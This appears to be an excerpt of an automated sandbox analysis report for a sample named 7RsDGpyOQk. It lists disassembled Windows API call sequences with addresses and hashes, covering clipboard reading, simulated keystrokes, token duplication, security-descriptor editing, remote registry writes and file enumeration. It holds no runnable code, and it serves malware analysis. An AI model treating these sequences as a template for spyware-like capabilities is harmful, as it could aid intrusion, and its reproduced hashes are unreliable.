                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 204ddb969aac78c9870546c316a7ecd7acdde3b3dc32cc6a6fcd47c4e4210109
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: 7631C471A40105DFC71ADF58D480A69F7A6FF6D300B658AA9E409CB651D731EEC1CBC0
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 034D22B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701993742.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_34d0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 071241f6d79be28b38f2155db14cd08856d6abcea90227d66870a1b6353381da
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: F4E0E67494010EDFDB00EFB8D64969E7FB4EF04301F1005A1FD01D2280D6709D509A72
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0022CE50
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0022CE91
                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0022CED6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0022CF00
                                                            • SendMessageW.USER32 ref: 0022CF29
                                                            • _wcsncpy.LIBCMT ref: 0022CFA1
                                                            • GetKeyState.USER32(00000011), ref: 0022CFC2
                                                            • GetKeyState.USER32(00000009), ref: 0022CFCF
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0022CFE5
                                                            • GetKeyState.USER32(00000010), ref: 0022CFEF
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0022D018
                                                            • SendMessageW.USER32 ref: 0022D03F
                                                            • SendMessageW.USER32(?,00001030,?,0022B602), ref: 0022D145
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0022D15B
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0022D16E
                                                            • SetCapture.USER32(?), ref: 0022D177
                                                            • ClientToScreen.USER32(?,?), ref: 0022D1DC
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0022D1E9
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0022D203
                                                            • ReleaseCapture.USER32 ref: 0022D20E
                                                            • GetCursorPos.USER32(?), ref: 0022D248
                                                            • ScreenToClient.USER32(?,?), ref: 0022D255
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0022D2B1
                                                            • SendMessageW.USER32 ref: 0022D2DF
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0022D31C
                                                            • SendMessageW.USER32 ref: 0022D34B
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0022D36C
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0022D37B
                                                            • GetCursorPos.USER32(?), ref: 0022D39B
                                                            • ScreenToClient.USER32(?,?), ref: 0022D3A8
                                                            • GetParent.USER32(?), ref: 0022D3C8
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0022D431
                                                            • SendMessageW.USER32 ref: 0022D462
                                                            • ClientToScreen.USER32(?,?), ref: 0022D4C0
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0022D4F0
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0022D51A
                                                            • SendMessageW.USER32 ref: 0022D53D
                                                            • ClientToScreen.USER32(?,?), ref: 0022D58F
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0022D5C3
                                                              • Part of subcall function 001A25DB: GetWindowLongW.USER32(?,000000EB), ref: 001A25EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0022D65F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F$pr&
                                                            • API String ID: 3977979337-2594466917
                                                            • Opcode ID: b7a323f589dee4093fd00d8aa14b4d10a731838e191e954b98ffca83c57d2cef
                                                            • Instruction ID: 54b53e531f4453cc93e3945a90aa417388529935b5e98914717757263b482f31
                                                            • Opcode Fuzzy Hash: b7a323f589dee4093fd00d8aa14b4d10a731838e191e954b98ffca83c57d2cef
                                                            • Instruction Fuzzy Hash: D742BF34214252BFD721CFA8E848FAABBF9FF49314F24052DF655872A0C7719865CB92
                                                            APIs
                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0022873F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 3850602802-328681919
                                                            • Opcode ID: 39a69eb75fe6d8338510f52dcdb1909d99a6065ef24113dc8d3ed506109737d4
                                                            • Instruction ID: c6da2b86e589e998ab3b0df2ce8b4b5bf0b22b02ef6f6d70bf2b6cbf260c704f
                                                            • Opcode Fuzzy Hash: 39a69eb75fe6d8338510f52dcdb1909d99a6065ef24113dc8d3ed506109737d4
                                                            • Instruction Fuzzy Hash: 6612E071511225BBEB258FA4EC49FAE7BB8EF49310F204129F915EA2E1DFB0C951CB50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: 0w%$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                            • API String ID: 1357608183-792763389
                                                            • Opcode ID: 728edeb418e56b97866d8d402b5656c4e2fbbf02668a9a043020c98f7ab16d7d
                                                            • Instruction ID: 61d1139951bb60ef31ad1687e3a4d3c3867dd499d2bbe94c593718391c6c9a7c
                                                            • Opcode Fuzzy Hash: 728edeb418e56b97866d8d402b5656c4e2fbbf02668a9a043020c98f7ab16d7d
                                                            • Instruction Fuzzy Hash: 24939271A04219DBDB28CF58C891BFDB7B1FF48710F25816AEA55EB290E7709E81CB50
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 001A4A3D
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001DDA8E
                                                            • IsIconic.USER32(?), ref: 001DDA97
                                                            • ShowWindow.USER32(?,00000009), ref: 001DDAA4
                                                            • SetForegroundWindow.USER32(?), ref: 001DDAAE
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001DDAC4
                                                            • GetCurrentThreadId.KERNEL32 ref: 001DDACB
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 001DDAD7
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 001DDAE8
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 001DDAF0
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 001DDAF8
                                                            • SetForegroundWindow.USER32(?), ref: 001DDAFB
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 001DDB10
                                                            • keybd_event.USER32(00000012,00000000), ref: 001DDB1B
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 001DDB25
                                                            • keybd_event.USER32(00000012,00000000), ref: 001DDB2A
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 001DDB33
                                                            • keybd_event.USER32(00000012,00000000), ref: 001DDB38
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 001DDB42
                                                            • keybd_event.USER32(00000012,00000000), ref: 001DDB47
                                                            • SetForegroundWindow.USER32(?), ref: 001DDB4A
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 001DDB71
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: b336ef775780f6927d49a55a3fc0589c75d3d919cd85fa0a9f432a69100afdbf
                                                            • Instruction ID: 7adb413cff6036cc4dbba87481ef2236f292ff977254fb6fce530685916558e6
                                                            • Opcode Fuzzy Hash: b336ef775780f6927d49a55a3fc0589c75d3d919cd85fa0a9f432a69100afdbf
                                                            • Instruction Fuzzy Hash: 32315271A40318BFEB316FA1AD4AF7F7E7CEB44B50F114036FA04AA1D0D6B45911AAA1
                                                            APIs
                                                              • Part of subcall function 001F8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001F8D0D
                                                              • Part of subcall function 001F8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001F8D3A
                                                              • Part of subcall function 001F8CC3: GetLastError.KERNEL32 ref: 001F8D47
                                                            • _memset.LIBCMT ref: 001F889B
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001F88ED
                                                            • CloseHandle.KERNEL32(?), ref: 001F88FE
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001F8915
                                                            • GetProcessWindowStation.USER32 ref: 001F892E
                                                            • SetProcessWindowStation.USER32(00000000), ref: 001F8938
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001F8952
                                                              • Part of subcall function 001F8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001F8851), ref: 001F8728
                                                              • Part of subcall function 001F8713: CloseHandle.KERNEL32(?,?,001F8851), ref: 001F873A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: 12cfe7ba17eaeb3fc2c389d170cbcc3e7a362c308ab1bc5f81fd9251f4f26530
                                                            • Instruction ID: 9a17e9ab0b59be2ad97a52f943efa7f1efcb95fbc8ed5640db8850ddf04234e2
                                                            • Opcode Fuzzy Hash: 12cfe7ba17eaeb3fc2c389d170cbcc3e7a362c308ab1bc5f81fd9251f4f26530
                                                            • Instruction Fuzzy Hash: A681277191020DBFDF21DFA4DD49AFEBBB8EF14304F18416AFA20A7161DB318A559B60
                                                            APIs
                                                            • OpenClipboard.USER32(0022F910), ref: 00214284
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00214292
                                                            • GetClipboardData.USER32(0000000D), ref: 0021429A
                                                            • CloseClipboard.USER32 ref: 002142A6
                                                            • GlobalLock.KERNEL32(00000000), ref: 002142C2
                                                            • CloseClipboard.USER32 ref: 002142CC
                                                            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 002142E1
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 002142EE
                                                            • GetClipboardData.USER32(00000001), ref: 002142F6
                                                            • GlobalLock.KERNEL32(00000000), ref: 00214303
                                                            • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00214337
                                                            • CloseClipboard.USER32 ref: 00214447
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                            • String ID:
                                                            • API String ID: 3222323430-0
                                                            • Opcode ID: 86e9d8e77240088c919d94a8050b41d48e113d19a40cb6d107aa5d9fe95c2c54
                                                            • Instruction ID: d680ad15a2454d8f2d9eaed6c5ad2ac1c8566731bc75d9e57b7ed789c3b96969
                                                            • Opcode Fuzzy Hash: 86e9d8e77240088c919d94a8050b41d48e113d19a40cb6d107aa5d9fe95c2c54
                                                            • Instruction Fuzzy Hash: A851B335204202ABD321FFA0ED89FBE77B8AFA5B00F104539F959D31A1DB70D9458B62
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0020C9F8
                                                            • FindClose.KERNEL32(00000000), ref: 0020CA4C
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0020CA71
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0020CA88
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0020CAAF
                                                            • __swprintf.LIBCMT ref: 0020CAFB
                                                            • __swprintf.LIBCMT ref: 0020CB3E
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                            • __swprintf.LIBCMT ref: 0020CB92
                                                              • Part of subcall function 001C38D8: __woutput_l.LIBCMT ref: 001C3931
                                                            • __swprintf.LIBCMT ref: 0020CBE0
                                                              • Part of subcall function 001C38D8: __flsbuf.LIBCMT ref: 001C3953
                                                              • Part of subcall function 001C38D8: __flsbuf.LIBCMT ref: 001C396B
                                                            • __swprintf.LIBCMT ref: 0020CC2F
                                                            • __swprintf.LIBCMT ref: 0020CC7E
                                                            • __swprintf.LIBCMT ref: 0020CCCD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: d19ad0405055d66076d437c9fcfa34bec803ee54580420dfa01c64ca4e860f55
                                                            • Instruction ID: f36f108bdc774d943bab970b97a6791a7b22f00e6b5fbd2c5e2faea66b022e29
                                                            • Opcode Fuzzy Hash: d19ad0405055d66076d437c9fcfa34bec803ee54580420dfa01c64ca4e860f55
                                                            • Instruction Fuzzy Hash: A9A14EB5518305ABC710EFA0C986DAFB7ECFFA5700F404929B595C3192EB34DA48CB62
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0020F221
                                                            • _wcscmp.LIBCMT ref: 0020F236
                                                            • _wcscmp.LIBCMT ref: 0020F24D
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0020F25F
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0020F279
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0020F291
                                                            • FindClose.KERNEL32(00000000), ref: 0020F29C
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0020F2B8
                                                            • _wcscmp.LIBCMT ref: 0020F2DF
                                                            • _wcscmp.LIBCMT ref: 0020F2F6
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0020F308
                                                            • SetCurrentDirectoryW.KERNEL32(0025A5A0), ref: 0020F326
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0020F330
                                                            • FindClose.KERNEL32(00000000), ref: 0020F33D
                                                            • FindClose.KERNEL32(00000000), ref: 0020F34F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: 9cc6178a33132c378601738c733d5fd7aae2e00d1914d54d9c211f4ee027fb24
                                                            • Instruction ID: 87835afd4020ad36041b2068b027bf41282be42d3a44f4fee80631975d38aa9e
                                                            • Opcode Fuzzy Hash: 9cc6178a33132c378601738c733d5fd7aae2e00d1914d54d9c211f4ee027fb24
                                                            • Instruction Fuzzy Hash: 0531D03655035ABECBA0DFA0ED49EDE73ACAF09321F1042B5E810E30E1EB30DA558A54
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00220BDE
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0022F910,00000000,?,00000000,?,?), ref: 00220C4C
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00220C94
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00220D1D
                                                            • RegCloseKey.ADVAPI32(?), ref: 0022103D
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0022104A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: 04465f4ced372fb1bdc7ef55f3e5537afb5aa8a1220e20dab9b6cf9f2909b577
                                                            • Instruction ID: 58cbfbbcd3da65045732f4d492cbf4a6187939d9337d8fb320c6f0037535d939
                                                            • Opcode Fuzzy Hash: 04465f4ced372fb1bdc7ef55f3e5537afb5aa8a1220e20dab9b6cf9f2909b577
                                                            • Instruction Fuzzy Hash: 39028D79210611AFCB14EF64D885E2AB7E5FF99714F04885DF88A9B362CB30ED51CB81
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0020F37E
                                                            • _wcscmp.LIBCMT ref: 0020F393
                                                            • _wcscmp.LIBCMT ref: 0020F3AA
                                                              • Part of subcall function 002045C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002045DC
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0020F3D9
                                                            • FindClose.KERNEL32(00000000), ref: 0020F3E4
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0020F400
                                                            • _wcscmp.LIBCMT ref: 0020F427
                                                            • _wcscmp.LIBCMT ref: 0020F43E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0020F450
                                                            • SetCurrentDirectoryW.KERNEL32(0025A5A0), ref: 0020F46E
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0020F478
                                                            • FindClose.KERNEL32(00000000), ref: 0020F485
                                                            • FindClose.KERNEL32(00000000), ref: 0020F497
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: da52ea3716a8c28cee48e4fcfbc151d06ae9610c5b362605aec89e5bee90ad7d
                                                            • Instruction ID: 1ffe2dba887360a5ca1c7b296ee0ed16c58775355349238bb243a6eca0616ebd
                                                            • Opcode Fuzzy Hash: da52ea3716a8c28cee48e4fcfbc151d06ae9610c5b362605aec89e5bee90ad7d
                                                            • Instruction Fuzzy Hash: A631043255035A7ACB70AFA4ED88EDE77BC9F09320F1042B5ED10A34E2E770DA65CA54
                                                            APIs
                                                              • Part of subcall function 001F874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001F8766
                                                              • Part of subcall function 001F874A: GetLastError.KERNEL32(?,001F822A,?,?,?), ref: 001F8770
                                                              • Part of subcall function 001F874A: GetProcessHeap.KERNEL32(00000008,?,?,001F822A,?,?,?), ref: 001F877F
                                                              • Part of subcall function 001F874A: HeapAlloc.KERNEL32(00000000,?,001F822A,?,?,?), ref: 001F8786
                                                              • Part of subcall function 001F874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001F879D
                                                              • Part of subcall function 001F87E7: GetProcessHeap.KERNEL32(00000008,001F8240,00000000,00000000,?,001F8240,?), ref: 001F87F3
                                                              • Part of subcall function 001F87E7: HeapAlloc.KERNEL32(00000000,?,001F8240,?), ref: 001F87FA
                                                              • Part of subcall function 001F87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001F8240,?), ref: 001F880B
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001F825B
                                                            • _memset.LIBCMT ref: 001F8270
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001F828F
                                                            • GetLengthSid.ADVAPI32(?), ref: 001F82A0
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 001F82DD
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001F82F9
                                                            • GetLengthSid.ADVAPI32(?), ref: 001F8316
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001F8325
                                                            • HeapAlloc.KERNEL32(00000000), ref: 001F832C
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001F834D
                                                            • CopySid.ADVAPI32(00000000), ref: 001F8354
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001F8385
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001F83AB
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001F83BF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
